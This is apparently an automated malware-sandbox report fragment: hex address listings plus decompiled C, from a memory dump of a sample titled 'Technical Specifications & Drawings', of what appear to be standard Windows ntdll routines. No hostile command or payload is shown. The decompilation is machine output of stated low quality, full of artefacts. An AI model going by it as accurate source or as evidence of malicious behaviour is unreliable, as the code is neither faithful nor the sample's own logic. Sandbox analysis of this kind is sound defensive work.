                                                  0x017d2627
                                                  0x017d2627
                                                  0x00000000
                                                  0x00000000
                                                  0x01815b1f
                                                  0x00000000
                                                  0x00000000
                                                  0x017d2894
                                                  0x017d289b
                                                  0x017d289d
                                                  0x017d28a1
                                                  0x01815b2b
                                                  0x01815b2e
                                                  0x01815b2e
                                                  0x017d28a7
                                                  0x017d28a9
                                                  0x01815b04
                                                  0x01815b09
                                                  0x01815b09
                                                  0x01815b09
                                                  0x00000000
                                                  0x00000000
                                                  0x01815b35
                                                  0x01815b3c
                                                  0x017d28fb
                                                  0x017d28fb
                                                  0x017d26cc
                                                  0x017d26cc
                                                  0x017d26d0
                                                  0x00000000
                                                  0x017d26d2
                                                  0x017d26d2
                                                  0x00000000
                                                  0x017d26d2
                                                  0x00000000
                                                  0x00000000
                                                  0x017d25fe
                                                  0x017d292d
                                                  0x017d292f
                                                  0x017d2930
                                                  0x017d2935
                                                  0x017d2937
                                                  0x017d2939
                                                  0x017d2939
                                                  0x017d293a
                                                  0x017d293a
                                                  0x017d293a
                                                  0x017d293d
                                                  0x017d293f
                                                  0x017d2941
                                                  0x017d2941
                                                  0x017d2942
                                                  0x017d2945
                                                  0x017d2945
                                                  0x017d2945
                                                  0x017d2946
                                                  0x017d294e
                                                  0x017d294f
                                                  0x017d295a
                                                  0x017d295d
                                                  0x017d2960
                                                  0x017d2960
                                                  0x017d2962
                                                  0x017d2963
                                                  0x017d2965
                                                  0x017d2965
                                                  0x017d2966
                                                  0x017d2969
                                                  0x017d296a
                                                  0x017d296a
                                                  0x017d296a
                                                  0x017d296e
                                                  0x017d296f
                                                  0x017d2971
                                                  0x017d2971
                                                  0x017d2972
                                                  0x017d2973
                                                  0x017d297b
                                                  0x017d2981
                                                  0x017d2982
                                                  0x017d2983
                                                  0x017d2984
                                                  0x017d2985
                                                  0x017d2986
                                                  0x017d2987
                                                  0x017d2988
                                                  0x017d2989
                                                  0x017d298a
                                                  0x017d298b
                                                  0x017d298c
                                                  0x017d298d
                                                  0x017d298e
                                                  0x017d298f
                                                  0x017d2990
                                                  0x017d2992
                                                  0x017d2997
                                                  0x017d29a3
                                                  0x017d29a6
                                                  0x017d29ab
                                                  0x017d29ad
                                                  0x017d29b0
                                                  0x017d29b2
                                                  0x01815c80
                                                  0x017d29b8
                                                  0x017d29b8
                                                  0x017d29bb
                                                  0x017d29c0
                                                  0x017d29c5
                                                  0x017d29c6
                                                  0x017d29c6
                                                  0x017d29c9
                                                  0x017d29cb
                                                  0x00000000
                                                  0x00000000
                                                  0x017d29cd
                                                  0x017d29d0
                                                  0x017d29d9
                                                  0x017d29db
                                                  0x017d29dd
                                                  0x017d2a7f
                                                  0x017d2a84
                                                  0x017d2a87
                                                  0x017d2a89
                                                  0x01815ca1
                                                  0x01815ca3
                                                  0x00000000
                                                  0x017d2a8f
                                                  0x017d2a8f
                                                  0x00000000
                                                  0x017d2a8f
                                                  0x00000000
                                                  0x017d29e3
                                                  0x017d29e3
                                                  0x017d29e3
                                                  0x00000000
                                                  0x017d29e3
                                                  0x017d29dd
                                                  0x00000000
                                                  0x017d29db
                                                  0x017d29e6
                                                  0x017d29e9
                                                  0x017d29eb
                                                  0x017d29ed
                                                  0x017d29f3
                                                  0x017d29f5
                                                  0x017d29f8
                                                  0x017d29fa
                                                  0x017d2a97
                                                  0x017d2a9a
                                                  0x017d2a9d
                                                  0x017d2add
                                                  0x00000000
                                                  0x017d2a9f
                                                  0x017d2aa2
                                                  0x017d2aa5
                                                  0x017d2aa8
                                                  0x017d2aab
                                                  0x01815cab
                                                  0x01815caf
                                                  0x01815cc5
                                                  0x01815cda
                                                  0x01815cdc
                                                  0x01815cdf
                                                  0x01815ce5
                                                  0x00000000
                                                  0x01815ceb
                                                  0x01815ced
                                                  0x01815cee
                                                  0x00000000
                                                  0x01815cee
                                                  0x01815cb1
                                                  0x01815cb4
                                                  0x01815cb9
                                                  0x01815cbb
                                                  0x00000000
                                                  0x01815cbd
                                                  0x01815cbd
                                                  0x00000000
                                                  0x01815cbd
                                                  0x01815cbb
                                                  0x017d2ab1
                                                  0x017d2ab1
                                                  0x017d2ac4
                                                  0x017d2ac6
                                                  0x017d2ac6
                                                  0x00000000
                                                  0x017d2ac6
                                                  0x017d2aab
                                                  0x00000000
                                                  0x017d2a00
                                                  0x017d2a09
                                                  0x017d2a0e
                                                  0x017d2a21
                                                  0x017d2a24
                                                  0x017d2a35
                                                  0x017d2a3a
                                                  0x017d2a3d
                                                  0x017d2a42
                                                  0x017d2a59
                                                  0x017d2a59
                                                  0x017d2a5c
                                                  0x017d2a5f
                                                  0x017d2a5f
                                                  0x017d29fa
                                                  0x017d29f3
                                                  0x017d2a64
                                                  0x017d2a64
                                                  0x017d2a6b
                                                  0x017d2a6b
                                                  0x017d2a6d
                                                  0x017d2a72
                                                  0x017d2a72
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PATH
                                                  • API String ID: 0-1036084923
                                                  • Opcode ID: cb165d12db3e5da71dba7b543abacf75fc8657cdcc95c70c388ced79575bbf19
                                                  • Instruction ID: 5a18848d7f91d089aee092e52c51c95eb478b9601902d3173c8e19f5b8f945c7
                                                  • Opcode Fuzzy Hash: cb165d12db3e5da71dba7b543abacf75fc8657cdcc95c70c388ced79575bbf19
                                                  • Instruction Fuzzy Hash: 78C19E71E0021ADBDB25DFA9D880BAEFBB5FF49710F194029E901FB255D734A942CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017AC962 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 42%
                                                  			E017AC962(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				intOrPtr _t22;
				void* _t26;
				void* _t27;
				void* _t32;
				intOrPtr _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x189d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E017BEEF0(0x18970a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0182F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E017BEB70(_t29, 0x18970a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E017EB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0182F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x18970c0; // 0x0
					while(_t38 != 0x18970c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x189b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                  0x017ac96a
                                                  0x017ac974
                                                  0x017ac988
                                                  0x017ac98a
                                                  0x01817c9d
                                                  0x01817c9f
                                                  0x01817ca4
                                                  0x01817cae
                                                  0x01817cf0
                                                  0x01817cf5
                                                  0x01817cfa
                                                  0x017ac992
                                                  0x017ac996
                                                  0x017ac997
                                                  0x017ac998
                                                  0x017ac9a3
                                                  0x017ac9a3
                                                  0x01817cb0
                                                  0x01817cb7
                                                  0x01817cbb
                                                  0x00000000
                                                  0x00000000
                                                  0x01817cbd
                                                  0x01817ce8
                                                  0x01817cc5
                                                  0x01817cc8
                                                  0x01817cca
                                                  0x01817cd0
                                                  0x01817cd6
                                                  0x01817cde
                                                  0x01817ce4
                                                  0x01817ce4
                                                  0x01817cd0
                                                  0x00000000
                                                  0x01817ce8
                                                  0x017ac990
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8cbc9b526742ac6c081a6e51c3cb0849b1368633d343be0d10e00932f37b8079
                                                  • Instruction ID: 1632bb4b7e3c47c741e4ce0cf0629997396d61ec8ca25841e3c6cf53d58951ff
                                                  • Opcode Fuzzy Hash: 8cbc9b526742ac6c081a6e51c3cb0849b1368633d343be0d10e00932f37b8079
                                                  • Instruction Fuzzy Hash: 1011E5323106069BCB21AF2CDC89A6BBBE9FB84710B54052DF945C3655DF20EE50CBD1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017DFAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 80%
                                                  			E017DFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E017BEEF0(0x1897b60);
					_t134 =  *0x1897b84; // 0x77577b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1897b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1897b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E017B6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E017B76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01848938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E017AB150();
													}
													_t116 = E01846D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E017B75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1898638; // 0x0
																	_t122 = L017B38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E017B76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E017B76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L017DFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L017B70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E017DFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E017DFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E017DFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E017DFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E017DFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1897b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1897b84 = _t75;
						_t73 = E017BEB70(_t134, 0x1897b60);
						if( *0x1897b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E017BFF60( *0x1897b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                  0x017dfab0
                                                  0x017dfab2
                                                  0x017dfab3
                                                  0x017dfab4
                                                  0x017dfabc
                                                  0x017dfac0
                                                  0x017dfb14
                                                  0x017dfb17
                                                  0x017dfac2
                                                  0x017dfac8
                                                  0x017dfacd
                                                  0x017dfad3
                                                  0x017dfad3
                                                  0x017dfadd
                                                  0x017dfb18
                                                  0x017dfb1b
                                                  0x017dfb1d
                                                  0x017dfb1e
                                                  0x017dfb1f
                                                  0x017dfb20
                                                  0x017dfb21
                                                  0x017dfb22
                                                  0x017dfb23
                                                  0x017dfb24
                                                  0x017dfb25
                                                  0x017dfb26
                                                  0x017dfb27
                                                  0x017dfb28
                                                  0x017dfb29
                                                  0x017dfb2a
                                                  0x017dfb2b
                                                  0x017dfb2c
                                                  0x017dfb2d
                                                  0x017dfb2e
                                                  0x017dfb2f
                                                  0x017dfb3a
                                                  0x017dfb3b
                                                  0x017dfb3e
                                                  0x017dfb41
                                                  0x017dfb44
                                                  0x017dfb47
                                                  0x017dfb4a
                                                  0x017dfb4d
                                                  0x017dfb53
                                                  0x0181bdcb
                                                  0x0181bdcb
                                                  0x017dfb59
                                                  0x017dfb5b
                                                  0x017dfb5b
                                                  0x017dfb5e
                                                  0x0181bdd5
                                                  0x0181bdd8
                                                  0x00000000
                                                  0x0181bdda
                                                  0x00000000
                                                  0x0181bdda
                                                  0x017dfb64
                                                  0x017dfb64
                                                  0x017dfb64
                                                  0x017dfb67
                                                  0x017dfb6e
                                                  0x017dfb70
                                                  0x017dfb72
                                                  0x00000000
                                                  0x017dfb78
                                                  0x017dfb7a
                                                  0x017dfb7a
                                                  0x017dfb7d
                                                  0x017dfb80
                                                  0x0181bddf
                                                  0x0181bde1
                                                  0x00000000
                                                  0x0181bde3
                                                  0x00000000
                                                  0x0181bde3
                                                  0x017dfb86
                                                  0x017dfb86
                                                  0x017dfb86
                                                  0x017dfb8b
                                                  0x017dfb90
                                                  0x017dfb92
                                                  0x017dfb94
                                                  0x017dfb9a
                                                  0x017dfb9b
                                                  0x017dfba1
                                                  0x0181bde8
                                                  0x0181bdeb
                                                  0x0181bded
                                                  0x0181beb5
                                                  0x0181beb5
                                                  0x0181bebb
                                                  0x0181bebd
                                                  0x0181bec3
                                                  0x0181bed2
                                                  0x0181bedd
                                                  0x0181bedd
                                                  0x0181beed
                                                  0x00000000
                                                  0x0181bdf3
                                                  0x0181bdfe
                                                  0x0181be06
                                                  0x0181be0b
                                                  0x0181be0d
                                                  0x0181be0f
                                                  0x0181be14
                                                  0x0181be19
                                                  0x0181be20
                                                  0x0181be25
                                                  0x0181be27
                                                  0x0181be35
                                                  0x0181be39
                                                  0x0181be46
                                                  0x0181be4f
                                                  0x0181be54
                                                  0x0181be56
                                                  0x0181bef8
                                                  0x0181bef8
                                                  0x00000000
                                                  0x0181be5c
                                                  0x0181be5c
                                                  0x0181be60
                                                  0x00000000
                                                  0x0181be66
                                                  0x0181be66
                                                  0x0181be7f
                                                  0x0181be84
                                                  0x0181be87
                                                  0x0181be89
                                                  0x0181be8b
                                                  0x0181be99
                                                  0x0181be9d
                                                  0x0181bea0
                                                  0x0181beac
                                                  0x0181beaf
                                                  0x0181beb1
                                                  0x0181beb3
                                                  0x0181beb3
                                                  0x00000000
                                                  0x0181bea2
                                                  0x0181bea2
                                                  0x00000000
                                                  0x0181bea2
                                                  0x0181be8d
                                                  0x0181be8d
                                                  0x0181be92
                                                  0x00000000
                                                  0x0181be92
                                                  0x0181be8b
                                                  0x0181be60
                                                  0x0181be3b
                                                  0x0181be3b
                                                  0x0181be3e
                                                  0x00000000
                                                  0x0181be40
                                                  0x0181be40
                                                  0x0181be44
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0181be44
                                                  0x0181be3e
                                                  0x0181be29
                                                  0x0181be29
                                                  0x00000000
                                                  0x0181be29
                                                  0x0181be27
                                                  0x00000000
                                                  0x017dfba7
                                                  0x017dfba7
                                                  0x017dfbab
                                                  0x0181bf02
                                                  0x017dfbb1
                                                  0x017dfbb1
                                                  0x017dfbb8
                                                  0x017dfbbd
                                                  0x017dfbbd
                                                  0x017dfbbf
                                                  0x017dfbbf
                                                  0x017dfbc5
                                                  0x017dfbcb
                                                  0x017dfbf8
                                                  0x017dfbf8
                                                  0x017dfbfa
                                                  0x00000000
                                                  0x017dfc00
                                                  0x017dfc00
                                                  0x017dfc03
                                                  0x00000000
                                                  0x017dfc09
                                                  0x017dfc09
                                                  0x017dfc0f
                                                  0x017dfc15
                                                  0x017dfc23
                                                  0x017dfc23
                                                  0x017dfc25
                                                  0x017dfc27
                                                  0x017dfc75
                                                  0x017dfc7c
                                                  0x017dfc84
                                                  0x00000000
                                                  0x017dfc29
                                                  0x017dfc29
                                                  0x017dfc2d
                                                  0x017dfc30
                                                  0x0181bf0f
                                                  0x00000000
                                                  0x017dfc36
                                                  0x017dfc38
                                                  0x017dfc3b
                                                  0x017dfc41
                                                  0x0181bf17
                                                  0x0181bf19
                                                  0x0181bf48
                                                  0x0181bf4b
                                                  0x00000000
                                                  0x0181bf1b
                                                  0x0181bf22
                                                  0x0181bf24
                                                  0x0181bf26
                                                  0x00000000
                                                  0x0181bf2c
                                                  0x0181bf37
                                                  0x0181bf39
                                                  0x0181bf3b
                                                  0x00000000
                                                  0x0181bf41
                                                  0x0181bf41
                                                  0x0181bf41
                                                  0x0181bf41
                                                  0x0181bf45
                                                  0x00000000
                                                  0x0181bf45
                                                  0x0181bf3b
                                                  0x0181bf26
                                                  0x00000000
                                                  0x017dfc47
                                                  0x017dfc47
                                                  0x017dfc49
                                                  0x017dfcb2
                                                  0x017dfcb4
                                                  0x017dfcb6
                                                  0x017dfcdc
                                                  0x017dfcdc
                                                  0x00000000
                                                  0x017dfcb8
                                                  0x017dfcc3
                                                  0x017dfcc5
                                                  0x017dfcc7
                                                  0x00000000
                                                  0x017dfcc9
                                                  0x017dfcc9
                                                  0x017dfccd
                                                  0x00000000
                                                  0x017dfccd
                                                  0x017dfcc7
                                                  0x00000000
                                                  0x017dfc4b
                                                  0x017dfc4b
                                                  0x017dfc4e
                                                  0x017dfc4e
                                                  0x017dfc51
                                                  0x017dfc51
                                                  0x017dfc54
                                                  0x017dfc5a
                                                  0x017dfc5c
                                                  0x017dfc5f
                                                  0x017dfc61
                                                  0x017dfc63
                                                  0x017dfc65
                                                  0x017dfc67
                                                  0x017dfc6e
                                                  0x017dfc72
                                                  0x017dfc72
                                                  0x017dfc72
                                                  0x017dfc72
                                                  0x017dfc67
                                                  0x017dfc61
                                                  0x00000000
                                                  0x017dfc5a
                                                  0x017dfc49
                                                  0x017dfc41
                                                  0x017dfc30
                                                  0x017dfc27
                                                  0x017dfc03
                                                  0x017dfbcd
                                                  0x017dfbd3
                                                  0x017dfbd9
                                                  0x017dfbdc
                                                  0x017dfbde
                                                  0x017dfc99
                                                  0x017dfc9b
                                                  0x017dfc9d
                                                  0x017dfcd5
                                                  0x017dfcd5
                                                  0x017dfc89
                                                  0x017dfc89
                                                  0x00000000
                                                  0x017dfc9f
                                                  0x017dfc9f
                                                  0x017dfca3
                                                  0x00000000
                                                  0x017dfca3
                                                  0x00000000
                                                  0x017dfbe4
                                                  0x017dfbe4
                                                  0x017dfbe4
                                                  0x017dfbe4
                                                  0x017dfbe9
                                                  0x017dfbf2
                                                  0x00000000
                                                  0x017dfbf2
                                                  0x017dfbde
                                                  0x017dfbcb
                                                  0x017dfbab
                                                  0x017dfc8b
                                                  0x017dfc8b
                                                  0x017dfc8c
                                                  0x017dfb80
                                                  0x017dfb72
                                                  0x017dfb5e
                                                  0x017dfc8d
                                                  0x017dfc91
                                                  0x017dfadf
                                                  0x017dfadf
                                                  0x017dfae1
                                                  0x017dfae4
                                                  0x017dfae7
                                                  0x017dfaec
                                                  0x017dfaf8
                                                  0x017dfb00
                                                  0x017dfb07
                                                  0x017dfb0f
                                                  0x017dfb0f
                                                  0x017dfb07
                                                  0x00000000
                                                  0x017dfaf8
                                                  0x017dfadd

                                                  Strings
                                                  • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0181BE0F
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                  • API String ID: 0-865735534
                                                  • Opcode ID: 82a13d00ab65e221f4ee77dcbf5816566e2544b50aba8bd0cbcb0a5bf8b975fa
                                                  • Instruction ID: d6b72d5b5bc22bd21ad891813ce1a59008c6536f717f1bdc5eb2faad4b6508ec
                                                  • Opcode Fuzzy Hash: 82a13d00ab65e221f4ee77dcbf5816566e2544b50aba8bd0cbcb0a5bf8b975fa
                                                  • Instruction Fuzzy Hash: 22A10872B0060A8BEB25DF68C4547BAF7B5AF48710F04456EE94BDB685DB30DA42CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017A2D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 63%
                                                  			E017A2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1895350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
